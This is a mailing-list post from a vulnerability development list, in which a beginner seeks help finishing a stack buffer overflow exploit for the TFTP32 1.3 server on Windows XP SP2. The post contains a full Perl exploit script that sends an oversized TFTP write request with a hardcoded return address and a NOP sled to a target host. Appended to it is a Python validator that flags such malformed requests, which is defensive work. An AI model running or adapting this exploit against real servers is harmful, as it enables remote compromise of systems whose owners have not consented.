Vuln Dev
Help needed in TFTP32v1.3 BO Oct 17 2007 05:53AM
wong yu liang (yuliang11 yahoo com)


Hi all,
I'm new to buffer overflows. I've gone through some basic
examples of buffer overflows; now I'm trying to write my own
exploit based on this software. Basically I found this
Perl script somewhere on the net. It takes 264 bytes
to overflow with 4 bytes extra for the EIP.
I'm using call esp, #0x77e2d9d3 advapi32.dll
WinXP SP2 for the RET and I found that I'm still 4
bytes off when I dump the ESP register in OllyDbg.
I've seen some examples on the net like "add esp 10, ret 4",
but I'm not sure what it means.
Hope someone can enlighten me on this. Thanks.

use IO::Socket;
$host = "10.10.10.2";#Target IP here
$port = "69";#Target Port Here. TFTP uses udp 69

#0x77e2d9d3 advapi32.dll
$shellcode="\xd3\xd9\xe2\x77";

$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS
$shellcode.="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";#NOPS 136

$buf ="\x00\x02";
$buf .= "\x41" x 264;

$buf .= $shellcode;

#Print size of buffer
print "Length: ", length($buf), "\n";

#Try to create socket
$socket = IO::Socket::INET->new(Proto => "udp")
    or die "Cannot Create Socket: $@\n";
$ipaddr = inet_aton($host) || $host;
$portaddr = sockaddr_in($port, $ipaddr);

#Send our evil buffer
send($socket, $buf, 0, $portaddr) == length($buf)
    or die "Cannot Send Buffer: $!\n";
print "All Done\n";

[ reply ]
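
Seen from the receiving side, the datagram built by the script in the post is a TFTP write request (opcode 2) whose filename field runs to about 400 bytes and never reaches a NUL terminator. The Python check below is an added example, not part of the original post; it validates RRQ/WRQ payloads against the RFC 1350 field layout so that such requests can be flagged or dropped. The function name, the 128-byte filename cap and both sample packets are assumptions constructed for illustration.

```python
import struct

MAX_FILENAME = 128  # assumed local policy, not a protocol constant
MODES = {b"netascii", b"octet", b"mail"}  # transfer modes defined by RFC 1350


def check_tftp_request(datagram: bytes) -> list:
    """Return findings for one UDP/69 payload; an empty list means no finding."""
    if len(datagram) < 4:
        return ["datagram too short for any TFTP packet"]
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (1, 2):  # only RRQ (1) and WRQ (2) carry filename/mode
        return []
    body = datagram[2:]
    fields = body.split(b"\x00")
    filename = fields[0]
    mode = fields[1].lower() if len(fields) > 1 else None
    findings = []
    if not body.endswith(b"\x00"):
        findings.append("request is not NUL-terminated")
    if not filename:
        findings.append("empty filename")
    if len(filename) > MAX_FILENAME:
        findings.append(f"filename length {len(filename)} exceeds {MAX_FILENAME}")
    if any(b < 0x20 or b > 0x7E for b in filename):
        findings.append("non-printable bytes in filename")
    if mode not in MODES:
        findings.append("missing or unknown transfer mode")
    return findings


# Constructed samples: a normal read request, and a datagram with the same
# layout as the script in the post (opcode 2, 264 filler bytes, a 4-byte
# placeholder where the script puts its return address, 136 bytes of 0x90).
NORMAL = b"\x00\x01boot.cfg\x00octet\x00"
OVERSIZED = b"\x00\x02" + b"A" * 264 + b"BBBB" + b"\x90" * 136

if __name__ == "__main__":
    for name, pkt in (("normal", NORMAL), ("oversized", OVERSIZED)):
        print(name, len(pkt), check_tftp_request(pkt))
```

The same four conditions translate directly into a length-and-terminator check in front of any fixed-size filename buffer in a TFTP server.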